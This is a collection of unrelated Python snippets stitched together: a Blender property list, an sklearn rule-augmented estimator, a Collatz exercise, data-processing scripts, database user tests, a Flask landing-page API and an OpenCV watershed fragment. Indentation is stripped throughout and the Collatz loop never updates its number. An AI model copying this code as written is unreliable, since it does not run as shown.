name: StringProperty(
name="Name",
description="The name of this property",
default="Untitled")
type: EnumProperty(
items=(
# (Haxe Type, Display Name, Description)
("String", "String", "String Type"),
("Int", "Integer", "Integer Type"),
("Float", "Float", "Float Type"),
("Bool", "Boolean", "Boolean Type"),
("Vec2", "Vec2", "2D Vector Type"),
("Vec3", "Vec3", "3D Vector Type"),
("Vec4", "Vec4", "4D Vector Type"),
("Object", "Object", "Object Type"),
("CameraObject", "Camera Object", "Camera Object Type"),
("LightObject", "Light Object", "Light Object Type"),
("MeshObject", "Mesh Object", "Mesh Object Type"),
("SpeakerObject", "Speaker Object", "Speaker Object Type")),
name="Type",
description="The type of this property",
default="String")
# === VALUES ===
value_string: StringProperty(name="Value", default="")
value_int: IntProperty(name="Value", default=0)
value_float: FloatProperty(name="Value", default=0.0)
value_bool: BoolProperty(name="Value", default=False)
value_vec2: FloatVectorProperty(name="Value", size=2)
value_vec3: FloatVectorProperty(name="Value", size=3)
value_vec4: FloatVectorProperty(name="Value", size=4)
value_object: PointerProperty(
name="Value", type=bpy.types.Object, poll=filter_objects)
def set_value(self, val):
        # Setting object references from a string would require way too much
        # effort, so it's out of scope here.
if self.type.endswith("Object"):
return
if self.type == "Int":
self.value_int = int(val)
elif self.type == "Float":
self.value_float = float(val)
elif self.type == "Bool":
self.value_bool = val == "true"
elif self.type in ("Vec2", "Vec3", "Vec4"):
if isinstance(val, str):
dimensions = int(self.type[-1])
# Parse "new VecX(...)"
val = val.split("(")[1].split(")")[0].split(",")
val = [value.strip() for value in val]
# new VecX() without parameters
if len(val) == 1 and val[0] == "":
# Use default value
return
# new VecX() with less parameters than its dimensions
while len(val) < dimensions:
val.append(0.0)
val = [float(value) for value in val]
setattr(self, "value_" + self.type.lower(), val)
else:
self.value_string = str(val)
def get_value(self):
if self.type == "Int":
return self.value_int
if self.type == "Float":
return self.value_float
if self.type == "Bool":
return self.value_bool
if self.type in ("Vec2", "Vec3", "Vec4"):
return list(getattr(self, "value_" + self.type.lower()))
if self.type.endswith("Object"):
if self.value_object is not None:
return self.value_object.name
return ""
return self.value_string
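# Example (illustrative): for an item with type "Vec3", set_value() parses the
# Haxe-style string "new Vec3(1, 2, 3)" into value_vec3 == (1.0, 2.0, 3.0),
# and get_value() returns it back as the list [1.0, 2.0, 3.0].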
class ARM_UL_PropList(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
item_value_ref = "value_" + item.type.lower()
custom_icon = PROP_TYPE_ICONS[item.type]
sp = layout.split(factor=0.3)
sp.label(text=item.type, icon=custom_icon)
sp = sp.split(factor=0.6)
sp.label(text=item.name)
# Make sure your code supports all 3 layout types
if self.layout_type in {'DEFAULT', 'COMPACT'}:
if item.type.endswith("Object"):
sp.prop_search(item, "value_object", context.scene, "objects", text="", icon=custom_icon)
else:
use_emboss = item.type in ("Bool", "String")
sp.prop(item, item_value_ref, text="", emboss=use_emboss)
elif self.layout_type in {'GRID'}:
layout.alignment = 'CENTER'
def register():
bpy.utils.register_class(ArmTraitPropWarning)
bpy.utils.register_class(ArmTraitPropListItem)
bpy.utils.register_class(ARM_UL_PropList)
def unregister():
bpy.utils.unregister_class(ARM_UL_PropList)
bpy.utils.unregister_class(ArmTraitPropListItem)
bpy.utils.unregister_class(ArmTraitPropWarning)
| nilq/baby-python | python |
import numpy as np
import pandas as pd
import sklearn
from typing import Dict, Tuple
from sklearn.base import BaseEstimator
class RuleAugmentedEstimator(BaseEstimator):
"""Augments sklearn estimators with rule-based logic.
This class is a wrapper class for sklearn estimators with the additional
possibility of adding rule-based logic to the underlying estimator.
The provided rules are hard-coded and take precedence over the underlying
estimator's predictions.
"""
def __init__(self, base_model: BaseEstimator, rules: Dict, **base_params):
"""Initializes the RuleAugmentedEstimator instance.
Initializes the rule-augmented estimator by supplying the underlying
sklearn estimator as well as the hard-coded rules.
Args:
base_model: The underlying sklearn estimator.
Must implement a fit and predict method.
rules: The hard-coded rules in the format of a dictionary,
with keys being the pandas dataframe column name, and the values
being a tuple in the following form:
(comparison operator, value, return value)
Acceptable comparison operators are:
"=", "<", ">", "<=", ">="
Example:
{"House Type": [
("=", "Penthouse", 1.0),
("=", "Shack", 0.0)
],
"House Price": [
("<", 1000.0, 0.0),
(">=", 500000.0, 1.0)
]}
**base_params: Optional keyword arguments which will be passed on
to the ``base_model``.
Examples:
The below example illustrates how an instance of the
RuleAugmentedEstimator class can be initialized with a trained
sklearn GradientBoostingRegressor instance.
>>> gbr = GradientBoostingRegressor()
>>> rules = {"House Type": [
("=", "Penthouse", 1.0),
("=", "Shack", 0.0)
],
"House Price": [
("<", 1000.0, 0.0),
(">=", 500000.0, 1.0)
]}
>>> ra_estimator = RuleAugmentedEstimator(gbr, rules)
"""
self.rules = rules
self.base_model = base_model
self.base_model.set_params(**base_params)
def __repr__(self):
return "Rule Augmented Estimator:\n\n\t Base Model: {}\n\t Rules: {}".format(self.base_model, self.rules)
def __str__(self):
        return self.__repr__()
def _get_base_model_data(self, X: pd.DataFrame, y: pd.Series) -> Tuple[pd.DataFrame, pd.Series]:
"""Filters the trainig data for data points not affected by the rules."""
train_x = X
for category, rules in self.rules.items():
if category not in train_x.columns.values: continue
for rule in rules:
if rule[0] == "=":
train_x = train_x.loc[train_x[category] != rule[1]]
elif rule[0] == "<":
train_x = train_x.loc[train_x[category] >= rule[1]]
elif rule[0] == ">":
train_x = train_x.loc[train_x[category] <= rule[1]]
elif rule[0] == "<=":
train_x = train_x.loc[train_x[category] > rule[1]]
elif rule[0] == ">=":
train_x = train_x.loc[train_x[category] < rule[1]]
else:
print("Invalid rule detected: {}".format(rule))
        indices = train_x.index.values
        train_y = y.loc[indices]
train_x = train_x.reset_index(drop=True)
train_y = train_y.reset_index(drop=True)
return train_x, train_y
def fit(self, X: pd.DataFrame, y: pd.Series, **kwargs):
"""Fits the estimator to the data.
Fits the estimator to the data, only training the underlying estimator
on data which isn't affected by the hard-coded rules.
Args:
X: The training feature data.
y: The training label data.
**kwargs: Optional keyword arguments passed to the underlying
estimator's fit function.
"""
train_x, train_y = self._get_base_model_data(X, y)
self.base_model.fit(train_x, train_y, **kwargs)
def predict(self, X: pd.DataFrame) -> np.array:
"""Gets predictions for the provided feature data.
        The predictions are evaluated using the provided rules wherever
        possible; otherwise the underlying estimator is used.
Args:
X: The feature data to evaluate predictions for.
Returns:
np.array: Evaluated predictions.
"""
p_X = X.copy()
p_X['prediction'] = np.nan
for category, rules in self.rules.items():
if category not in p_X.columns.values: continue
for rule in rules:
if rule[0] == "=":
p_X.loc[p_X[category] == rule[1], 'prediction'] = rule[2]
elif rule[0] == "<":
p_X.loc[p_X[category] < rule[1], 'prediction'] = rule[2]
elif rule[0] == ">":
p_X.loc[p_X[category] > rule[1], 'prediction'] = rule[2]
elif rule[0] == "<=":
p_X.loc[p_X[category] <= rule[1], 'prediction'] = rule[2]
elif rule[0] == ">=":
p_X.loc[p_X[category] >= rule[1], 'prediction'] = rule[2]
else:
print("Invalid rule detected: {}".format(rule))
        if len(p_X.loc[p_X['prediction'].isna()].index) != 0:
base_X = p_X.loc[p_X['prediction'].isna()].copy()
base_X.drop('prediction', axis=1, inplace=True)
p_X.loc[p_X['prediction'].isna(), 'prediction'] = self.base_model.predict(base_X)
return p_X['prediction'].values
def get_params(self, deep: bool = True) -> Dict:
"""Return the model's and base model's parameters.
Args:
deep: Whether to recursively return the base model's parameters.
        Returns:
            Dict: The model's parameters.
        """
        params = {'base_model': self.base_model,
                  'rules': self.rules
                  }
params.update(self.base_model.get_params(deep=deep))
return params
def set_params(self, **params):
"""Sets parameters for the model and base model.
Args:
**params: Optional keyword arguments.
"""
parameters = params
param_keys = parameters.keys()
if 'base_model' in param_keys:
value = parameters.pop('base_model')
self.base_model = value
if 'rules' in param_keys:
value = parameters.pop('rules')
self.rules = value
self.base_model.set_params(**parameters)
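# Example usage (a minimal sketch; the estimator, column names, rule values and
# the X_train/y_train/X_test pandas objects are illustrative placeholders):
#
#   from sklearn.ensemble import GradientBoostingRegressor
#   rules = {"House Type": [("=", "Penthouse", 1.0), ("=", "Shack", 0.0)]}
#   ra_estimator = RuleAugmentedEstimator(GradientBoostingRegressor(), rules)
#   ra_estimator.fit(X_train, y_train)
#   predictions = ra_estimator.predict(X_test)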
| nilq/baby-python | python |
# jay mahakal
import Resources.Work_By_Raj.Google_Calender_api.Resources.Setup
import Resources.Work_By_Raj.Google_Calender_api.Resources.Return_events_info
# The function below [Setup.setup_calendar_credentials_return_service()] should run only once
# service = Setup.setup_calendar_credentials_return_service()
# print(Return_events_info.return_events_info("Give details about calendar events for today", service=service))
| nilq/baby-python | python |
print "Ejercicio de ciclos -Granizada-"
def par(n):
n=n/2
def impar(n):
n=n*3+1
n=int(raw_input("digite numero "))
while n>=1:
if n%2==0:
par(n)
print n
else:
impar(n)
print n
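# Sample run: entering 6 prints the hailstone (Collatz) sequence
# 3, 10, 5, 16, 8, 4, 2, 1.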
| nilq/baby-python | python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 1 15:39:06 2020
@author: jireh.park
"""
import pandas as pd
import os
from tqdm import tqdm
from google.cloud import storage
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))+ '/key/level-district.json'
def list_blob(bucket_name):
    """Lists all blobs in the bucket."""
    # bucket_name = "your-bucket-name"
    storage_client = storage.Client()
    bucket = storage_client.bucket(bucket_name)
    blobs = list(bucket.list_blobs())
    print(blobs)
bucket_name = 'j-first-bucket'
save_path = 'route/'
list_blob(bucket_name)
os.chdir("/Users/jireh.park/jireh_module/svc_data/route")
# Load the data
df = pd.DataFrame()
for fl in os.listdir():
if 'txt' in fl:
data = pd.read_csv(fl,
engine = 'python', encoding = 'cp949', sep = '|', dtype = str)
df = df.append(data)
df = df.reset_index(drop = True)
# Flip start and destination and save
size = len(df)
col = ['time', 'num_station', 'transfer']
for ii in tqdm(df.index):
aa = df.loc[ii, 'route'][2:-2].split("', '")
aa.reverse()
df.loc[size + ii, 'start'] = df.loc[ii, 'destination']
df.loc[size + ii, 'destination'] = df.loc[ii, 'start']
for cl in col:
df.loc[size + ii, cl] = df.loc[ii, cl]
df.loc[size + ii, 'route'] = aa
df = df.reset_index(drop = True)
df.to_csv("route.csv", encoding = 'cp949', index = False)
#df.to_json("route.json")
| nilq/baby-python | python |
#!/usr/bin/env python2.7
import os
import codecs
import json
import random
with codecs.open(os.path.join(os.path.dirname(os.path.realpath(__file__)), "apps.txt"), encoding="utf-8") as f:
apps = f.read().splitlines()
with codecs.open(os.path.join(os.path.dirname(os.path.realpath(__file__)), "networks.txt"), encoding="utf-8") as f:
networks = f.read().splitlines()
dim_groups = [
["install_date", "install_country", "ad_network", "campaign"],
["install_date", "ad_network", "campaign"],
["install_date", "install_country", "ad_network"],
["install_date", "ad_network", "campaign", "event_name"],
["install_date", "install_country", "ad_network", "campaign", "event_name"]
]
metric_groups = [
["installs_count", "clicks_count", "launches_count"],
["installs_count", "install_cost", "install_cost_alt", "revenue", "revenue_alt"],
["revenue", "revenue_alt", "inapps_count"],
["clicks_count", "impressions_count", "installs_count", "launches_count"],
["clicks_count", "impressions_count", "installs_count", "uninstalls_count"]
]
date_ranges = [
["2015-01-01", "2015-01-14"],
["2015-01-01", "2015-01-30"],
["2013-05-01", "2013-05-14"],
["2014-01-01", "2015-03-01"],
["2014-12-01", "2015-01-01"],
["2015-02-01", "2015-02-08"],
["2013-01-01", "2013-03-01"]
]
country_groups = [
["US", "IR", "UK", "MX"],
["US", "IL", "KZ"],
["RU", "BE"],
["TG", "TH", "TJ", "TL", "TM", "TN", "TO", "TR", "TT", "TV", "TZ", "UA", "UG", "US", "UY", "UZ", "VA", "VC", "VE", "VN", "VU", "WS", "YE", "ZA", "ZM", "ZW"]
]
for i in range(1000):
dates = random.choice(date_ranges)
query = {
"type": "aggregate",
"table": "activity",
"select": [],
"filter": {
"op": "and",
"filters": [
{"op": "eq", "column": "app_id", "value": random.choice(apps)},
{"op": "ge", "column": "install_date", "value": dates[0]},
{"op": "lt", "column": "install_date", "value": dates[1]}
]
}
}
query["select"] = [{"column": c} for c in random.choice(dim_groups) + random.choice(metric_groups)]
if random.random() < 0.2:
query["filter"]["filters"].append({"op": "in", "column": "install_country", "values": random.choice(country_groups)})
if random.random() < 0.5:
query["filter"]["filters"].append({"op": "eq", "column": "ad_network", "value": random.choice(networks)})
print "http://localhost:5000/query POST %s" % json.dumps(query)
| nilq/baby-python | python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""user表测试"""
from executor.database.models.user import Users
from executor.tests.database.base import DatabaseTestCase
from executor.exceptions import UserAlreadyExistException, \
IncorrectPasswordException
class TestOperatorUser(DatabaseTestCase):
data_file_path = "database_user_data.yaml"
def test_create_user(self):
user = Users.from_json(self.get_test_date("test_create_user"))
new_user = self.db.create_user(self.context, user)
self.assertIsInstance(new_user, Users)
self.db.delete_user(self.context, new_user.id, new_user.password)
def test_create_same_name_user(self):
user1 = Users.from_json(
self.get_test_date(
"test_create_same_name_user", "test_create_same_name_user1"))
user2 = Users.from_json(
self.get_test_date(
"test_create_same_name_user", "test_create_same_name_user2"))
self.db.create_user(self.context, user1)
self.assertRaises(UserAlreadyExistException,
self.db.create_user, self.context, user2)
self.db.delete_user(self.context, user1.phone, user1.password)
def test_create_same_phone_user(self):
user1 = Users.from_json(
self.get_test_date(
"test_create_same_phone_user", "test_create_same_phone_user1"
))
user2 = Users.from_json(
self.get_test_date(
"test_create_same_phone_user", "test_create_same_phone_user2"
))
self.db.create_user(self.context, user1)
self.assertRaises(UserAlreadyExistException,
self.db.create_user, self.context, user2)
self.db.delete_user(self.context, user1.phone, user1.password)
def test_get_user_by_id(self):
user = Users.from_json(
self.get_test_date("test_get_user_by_id")
)
n_user = self.db.create_user(self.context, user)
self.assertEqual(
n_user,
self.db.get_user(self.context, user.id, user.password))
self.db.delete_user(self.context, n_user.id, n_user.password)
def test_get_user_by_user_id(self):
user = Users.from_json(
self.get_test_date("test_get_user_by_user_id")
)
n_user = self.db.create_user(self.context, user)
self.assertEqual(
n_user,
self.db.get_user(self.context, user.user_id, user.password))
self.db.delete_user(self.context, n_user.user_id, n_user.password)
def test_get_user_by_name(self):
user = Users.from_json(
self.get_test_date("test_get_user_by_name")
)
n_user = self.db.create_user(self.context, user)
self.assertEqual(
n_user,
self.db.get_user(self.context, user.username, user.password))
self.db.delete_user(self.context, n_user.username, n_user.password)
def test_get_user_by_phone(self):
user = Users.from_json(
self.get_test_date("test_get_user_by_phone")
)
n_user = self.db.create_user(self.context, user)
self.assertEqual(
n_user,
self.db.get_user(self.context, user.phone, user.password))
self.db.delete_user(self.context, n_user.phone, n_user.password)
def test_get_user_with_incorrect_password(self):
user = Users.from_json(
self.get_test_date("test_get_user_with_incorrect_password")
)
n_user = self.db.create_user(self.context, user)
self.assertRaises(
IncorrectPasswordException,
self.db.get_user, self.context, n_user.phone,
n_user.password + "_"
)
self.db.delete_user(self.context, n_user.id, n_user.password)
| nilq/baby-python | python |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines endpoints for the landing page.
TODO(shifucun): once this is well tested, can deprecate corresponding code
in chart.py and place.py
"""
import collections
import copy
import json
import logging
import urllib
from flask import Blueprint, current_app, Response, url_for, g
from flask_babel import gettext
from collections import defaultdict
from cache import cache
import services.datacommons as dc_service
import routes.api.place as place_api
import lib.range as lib_range
# Define blueprint
bp = Blueprint("api.landing_page", __name__, url_prefix='/api/landingpage')
BAR_CHART_TYPES = ['parent', 'similar', 'nearby', 'child']
MAX_DENOMINATOR_BACK_YEAR = 3
MIN_CHART_TO_KEEP_TOPICS = 30
OVERVIEW = 'Overview'
def get_landing_page_data(dcid, new_stat_vars):
response = dc_service.fetch_data('/landing-page', {
'place': dcid,
'newStatVars': new_stat_vars,
},
compress=False,
post=True,
has_payload=False)
return response
def build_url(dcids, statvar_to_denom, is_scaled=False):
anchor = '&place=' + ','.join(dcids)
parts = []
for statvar, denom in statvar_to_denom.items():
part = statvar
if denom:
part += '|' + denom
parts.append(part)
anchor += ('&statsVar=' + '__'.join(parts))
if is_scaled:
anchor = anchor + '&pc'
return urllib.parse.unquote(url_for('tools.timeline', _anchor=anchor))
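# Example (illustrative): build_url(['geoId/06'], {'Count_Person': None})
# returns the timeline tool URL with the anchor
# '#&place=geoId/06&statsVar=Count_Person' appended.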
def fill_translation(chart):
chart['title'] = gettext(chart['titleId'])
del chart['titleId']
if 'description' in chart:
del chart['description']
return chart
# TODO: add test for chart_config for assumption that each combination of stat vars will only have one config in chart_config.
def build_spec(chart_config):
"""Builds hierachical spec based on chart config."""
spec = defaultdict(lambda: defaultdict(list))
# Map: category -> topic -> [config]
for conf in chart_config:
config = copy.deepcopy(conf)
config = fill_translation(config)
if 'relatedChart' in config and config['relatedChart']['scale']:
config['relatedChart'] = fill_translation(config['relatedChart'])
is_overview = ('isOverview' in config and config['isOverview'])
category = config['category']
if 'isOverview' in config:
del config['isOverview']
del config['category']
if is_overview:
spec[OVERVIEW][category].append(copy.deepcopy(config))
spec[category][config['title']].append(config)
return spec
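# Example (illustrative): a config entry with category 'Economics', title
# 'Median income' and isOverview=True ends up in both
# spec['Overview']['Economics'] and spec['Economics']['Median income'].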
def get_denom(cc, related_chart=False):
"""Get the numerator and denominator map."""
# If chart requires denominator, use it for both primary and related charts.
if 'denominator' in cc:
result = {}
if len(cc['denominator']) != len(cc['statsVars']):
            raise ValueError('Denominator number not matching: %s' % cc)
for num, denom in zip(cc['statsVars'], cc['denominator']):
result[num] = denom
return result
# For related chart, use the denominator that is specified in the
# 'relatedChart' field if present.
if related_chart and cc.get('relatedChart', {}).get('scale', False):
return cc['relatedChart'].get('denominator', 'Count_Person')
return None
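# Worked example (illustrative): for a chart config with
# statsVars=['Count_Person_Male'] and denominator=['Count_Person'], get_denom
# returns {'Count_Person_Male': 'Count_Person'}.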
def get_series(data, place, stat_vars):
"""Get time series from the landing page data.
Aggregate for all the stat vars and return empty series if any stat var data
is missing
Returns:
series and sources.
"""
all_series = []
sources = set()
num_sv = len(stat_vars)
for sv in stat_vars:
if 'data' not in data[place] or sv not in data[place]['data']:
return {}, []
series = data[place]['data'][sv]
all_series.append(series['val'])
sources.add(series['metadata']['provenanceUrl'])
# One series, no need to aggregate
if num_sv == 1:
return all_series[0], sources
merged_series = defaultdict(list)
for series in all_series:
for date, value in series.items():
merged_series[date].append(value)
# Aggregate
agg_series = {}
for date, values in merged_series.items():
if len(values) == num_sv:
agg_series[date] = sum(values)
return agg_series, sources
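# Worked example (illustrative): aggregating stat_vars ['A', 'B'] with series
# A = {'2019': 1, '2020': 2} and B = {'2020': 3} keeps only dates covered by
# every stat var, giving {'2020': 5}.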
def get_stat_var_group(cc, data, places):
"""Get the stat var grouping for aggregation."""
if 'aggregate' in cc:
agg_type = lib_range.get_aggregate_config(cc['aggregate'])
place_stat_vars = defaultdict(list)
for place in places:
if place not in data or 'data' not in data[place]:
continue
for sv in cc['statsVars']:
if sv in data[place]['data']:
place_stat_vars[place].append(sv)
result = lib_range.aggregate_stat_var(place_stat_vars, agg_type)
for place in places:
if place not in result:
result[place] = {}
else:
result = {}
for place in places:
result[place] = {sv: [sv] for sv in cc['statsVars']}
return result
def get_snapshot_across_places(cc, data, places):
"""Get the snapshot used for bar data across a few places.
This will scale the value if required and pick the latest date that has the
most <place, stat_var> entries.
"""
if not places:
return {}, {}
# date_to_data is a dictionary from date to place and a tuple of
# (stat_var, value) pair.
# Example:
# {
# "2018": {
# "geoId/06":[("Count_Person", 200), ("Count_Person_Female", 100)],
# "geoId/08":[("Count_Person", 300), ("Count_Person_Female", 150)],
# },
# "2017": {
# "geoId/06":[("Count_Person", 300), ("Count_Person_Female", 150)],
# "geoId/08":[("Count_Person", 400), ("Count_Person_Female", 200)],
# },
# }
date_to_data = collections.defaultdict(
lambda: collections.defaultdict(list))
# TODO(shifucun/beets): add a unittest to ensure denominator is set
# explicitly when scale==True
num_denom = get_denom(cc, related_chart=True)
sources = set()
place_stat_var_group = get_stat_var_group(cc, data, places)
statvar_to_denom = {}
for place in places:
if place not in data:
continue
stat_var_group = place_stat_var_group[place]
for num_sv, sv_list in stat_var_group.items():
num_series, num_sources = get_series(data, place, sv_list)
if not num_series:
continue
sources.update(num_sources)
if num_denom:
if isinstance(num_denom, dict):
denom_sv = num_denom[num_sv]
else:
denom_sv = num_denom
statvar_to_denom[num_sv] = denom_sv
denom_series, denom_sources = get_series(
data, place, [denom_sv])
if not denom_series:
continue
sources.update(denom_sources)
result_series = scale_series(num_series, denom_series)
else:
result_series = num_series
statvar_to_denom[num_sv] = None
# Turn the value to be keyed by date.
for date, value in result_series.items():
date_to_data[date][place].append((num_sv, value))
# Pick a date that has the most series across places.
dates = sorted(date_to_data.keys(), reverse=True)
if not dates:
return {}, {}
count = 0
chosen_date = None
for date in dates:
if len(date_to_data[date]) > count:
count = len(date_to_data[date])
chosen_date = date
result = {'date': chosen_date, 'data': [], 'sources': list(sources)}
for place in places:
points = {}
for stat_var, value in date_to_data[chosen_date][place]:
points[stat_var] = value
if points:
result['data'].append({'dcid': place, 'data': points})
return result, statvar_to_denom
# TODO(shifucun): Add unittest for these helper functions
def get_bar(cc, data, places):
"""Get the bar data across a few places.
This will scale the value if required and pick the latest date that has the
most <place, stat_var> entries.
"""
result, statvar_denom = get_snapshot_across_places(cc, data, places)
if not result:
return {}
# Should have data other than the primary place. Return empty struct to
# so client won't draw chart.
if len(result['data']) <= 1:
return {}
is_scaled = (('relatedChart' in cc and
cc['relatedChart'].get('scale', False)) or
('denominator' in cc))
result['exploreUrl'] = build_url(places, statvar_denom, is_scaled)
return result
def get_trend(cc, data, place):
"""Get the time series data for a place."""
if place not in data:
return {}
result_series = {}
sources = set()
num_denom = get_denom(cc)
stat_var_group = get_stat_var_group(cc, data, [place])[place]
statvar_denom = {}
for num_sv, sv_list in stat_var_group.items():
num_series, num_sources = get_series(data, place, sv_list)
if not num_series:
continue
sources.update(num_sources)
if num_denom:
if isinstance(num_denom, dict):
denom_sv = num_denom[num_sv]
else:
denom_sv = num_denom
statvar_denom[num_sv] = denom_sv
denom_series, denom_sources = get_series(data, place, [denom_sv])
if not denom_series:
continue
sources.update(denom_sources)
result_series[num_sv] = scale_series(num_series, denom_series)
else:
result_series[num_sv] = num_series
statvar_denom[num_sv] = None
# filter out time series with single data point.
for sv in list(result_series.keys()):
if len(result_series[sv]) <= 1:
del result_series[sv]
if not result_series:
return {}
is_scaled = ('denominator' in cc)
return {
'series': result_series,
'sources': list(sources),
'exploreUrl': build_url([place], statvar_denom, is_scaled)
}
def get_year(date):
    try:
        return int(date.split('-')[0])
    except (IndexError, ValueError):
        raise ValueError('no valid date format found %s' % date)
# TODO(shifucun): Add unittest.
def scale_series(numerator, denominator):
"""Scale two time series.
    The dates of the two time series may not be exactly aligned. Here we use
    year alignment to match the two dates. If no denominator is found for a
    numerator value, that data point is removed.
    """
data = {}
for date, value in numerator.items():
if date in denominator:
if denominator[date] > 0:
data[date] = value / denominator[date]
else:
data[date] = 0
else:
try:
numerator_year = get_year(date)
for i in range(0, MAX_DENOMINATOR_BACK_YEAR + 1):
year = str(numerator_year - i)
if year in denominator:
if denominator[year] > 0:
data[date] = value / denominator[year]
else:
data[date] = 0
break
except ValueError:
return {}
return data
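# Worked example (illustrative): with numerator {'2015-06': 50} and
# denominator {'2014': 100} there is no exact date match, so the year 2015 is
# tried first, then 2014 (within MAX_DENOMINATOR_BACK_YEAR), giving
# {'2015-06': 0.5}.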
def get_i18n_all_child_places(raw_page_data):
all_child_places = raw_page_data.get('allChildPlaces', {})
all_dcids = []
for place_type in list(all_child_places.keys()):
for place in all_child_places[place_type]['places']:
all_dcids.append(place.get('dcid', ''))
i18n_names = place_api.get_i18n_name(all_dcids,
False) # Don't resolve en-only names
for place_type in list(all_child_places.keys()):
for place in all_child_places[place_type]['places']:
dcid = place.get('dcid')
i18n_name = i18n_names.get(dcid, '')
if i18n_name:
place['name'] = i18n_name
for place_type in list(all_child_places.keys()):
all_child_places[place_type] = all_child_places[place_type]['places']
return all_child_places
@bp.route('/data/<path:dcid>')
@cache.cached(timeout=3600 * 24, query_string=True) # Cache for one day.
def data(dcid):
"""
Get chart spec and stats data of the landing page for a given place.
"""
logging.info("Landing Page: cache miss for %s, fetch and process data ...",
dcid)
spec_and_stat = build_spec(current_app.config['CHART_CONFIG'])
new_stat_vars = current_app.config['NEW_STAT_VARS']
raw_page_data = get_landing_page_data(dcid, new_stat_vars)
    if 'statVarSeries' not in raw_page_data:
logging.info("Landing Page: No data for %s", dcid)
return Response(json.dumps({}), 200, mimetype='application/json')
# Filter out Metropolitan France parent place.
parent_places = [
el for el in raw_page_data.get('parentPlaces', [])
if el != 'country/FXX'
]
raw_page_data['parentPlaces'] = parent_places
# Only US places have comparison charts.
is_usa_place = False
for place in [dcid] + raw_page_data.get('parentPlaces', []):
if place == 'country/USA':
is_usa_place = True
break
# Populate the data for each chart
all_stat = raw_page_data['statVarSeries']
for category in spec_and_stat:
if category == OVERVIEW:
if is_usa_place:
chart_types = ['nearby', 'child']
else:
chart_types = ['similar']
else:
chart_types = BAR_CHART_TYPES
for topic in spec_and_stat[category]:
for chart in spec_and_stat[category][topic]:
# Trend data
chart['trend'] = get_trend(chart, all_stat, dcid)
if 'aggregate' in chart:
aggregated_stat_vars = list(chart['trend'].get(
'series', {}).keys())
if aggregated_stat_vars:
chart['trend']['statsVars'] = aggregated_stat_vars
else:
chart['trend'] = {}
# Bar data
for t in chart_types:
chart[t] = get_bar(chart, all_stat, [dcid] +
raw_page_data.get(t + 'Places', []))
if t == 'similar' and 'data' in chart[t]:
# If no data for current place, do not serve similar
# place data.
keep_chart = False
for d in chart[t]['data']:
if d['dcid'] == dcid:
keep_chart = True
break
if not keep_chart:
chart[t] = {}
# Update stat vars for aggregated stats
if 'aggregate' in chart and chart[t]:
chart[t]['statsVars'] = []
for place_data in chart[t].get('data', []):
stat_vars = list(place_data['data'].keys())
if len(stat_vars) > len(chart[t]['statsVars']):
chart[t]['statsVars'] = stat_vars
elif len(stat_vars) == 0:
chart[t] = {}
if 'aggregate' in chart:
chart['statsVars'] = []
# Remove empty category and topics
for category in list(spec_and_stat.keys()):
for topic in list(spec_and_stat[category].keys()):
filtered_charts = []
for chart in spec_and_stat[category][topic]:
keep_chart = False
for t in ['trend'] + BAR_CHART_TYPES:
if chart.get(t, None):
keep_chart = True
break
if keep_chart:
filtered_charts.append(chart)
if not filtered_charts:
del spec_and_stat[category][topic]
else:
spec_and_stat[category][topic] = filtered_charts
if not spec_and_stat[category]:
del spec_and_stat[category]
# Only keep the "Overview" category if the number of total chart is less
# than certain threshold.
overview_set = set()
non_overview_set = set()
chart_count = 0
# Get the overview charts
for topic, charts in spec_and_stat[OVERVIEW].items():
for chart in charts:
overview_set.add((topic, chart['title']))
chart_count += 1
# Get the non overview charts
for category, topic_data in spec_and_stat.items():
if category == OVERVIEW:
continue
for topic in topic_data:
if (category, topic) not in overview_set:
non_overview_set.add((category, topic))
chart_count += 1
# If the total number of chart is too small, then merge all charts to
# the overview category and remove other categories
if chart_count < MIN_CHART_TO_KEEP_TOPICS:
for category, topic in non_overview_set:
spec_and_stat[OVERVIEW][category].extend(
spec_and_stat[category][topic])
for category in list(spec_and_stat.keys()):
if category != OVERVIEW:
del spec_and_stat[category]
# Get chart category name translations
categories = {}
for category in list(spec_and_stat.keys()) + list(spec_and_stat[OVERVIEW]):
categories[category] = gettext(f'CHART_TITLE-CHART_CATEGORY-{category}')
# Get display name for all places
all_places = [dcid]
for t in BAR_CHART_TYPES:
all_places.extend(raw_page_data.get(t + 'Places', []))
names = place_api.get_display_name('^'.join(sorted(all_places)), g.locale)
# Pick data to highlight - only population for now
population, statvar_denom = get_snapshot_across_places(
{'statsVars': ['Count_Person']}, all_stat, [dcid])
highlight = {gettext('CHART_TITLE-Population'): population}
response = {
'pageChart': spec_and_stat,
'allChildPlaces': get_i18n_all_child_places(raw_page_data),
'childPlacesType': raw_page_data.get('childPlacesType', ""),
'childPlaces': raw_page_data.get('childPlaces', []),
'parentPlaces': raw_page_data.get('parentPlaces', []),
'similarPlaces': raw_page_data.get('similarPlaces', []),
'nearbyPlaces': raw_page_data.get('nearbyPlaces', []),
'categories': categories,
'names': names,
'highlight': highlight,
}
return Response(json.dumps(response), 200, mimetype='application/json')
| nilq/baby-python | python |
# NOTE
# Original cell image of the recently discovered SARS-CoV-2 virus,
# popularly known as COVID-19 or Coronavirus.
import cv2 as cv
import numpy as np
import matplotlib.pyplot as plt
!wget "https://raw.githubusercontent.com/PedroHaupenthal/Image-Processing/master/watershed/covid_19.jpg" -O "covid_19.jpg"
img1 = cv.imread("covid_19.jpg")
img1 = cv.cvtColor(img1, cv.COLOR_BGR2RGB)
img2 = cv.cvtColor(img1, cv.COLOR_RGB2GRAY)
img2 = cv.bitwise_not(img2)
ret, img2 = cv.threshold(img2,
0,
255,
cv.THRESH_BINARY_INV + cv.THRESH_OTSU)
# Remove small noise with a morphological closing, then dilate to obtain the
# sure-background region.
kernel = np.ones((3, 3), np.uint8)
img3 = cv.morphologyEx(img2,
                       cv.MORPH_CLOSE,
                       kernel,
                       iterations = 2)
img4 = cv.dilate(img3,
                 kernel,
                 iterations = 5)
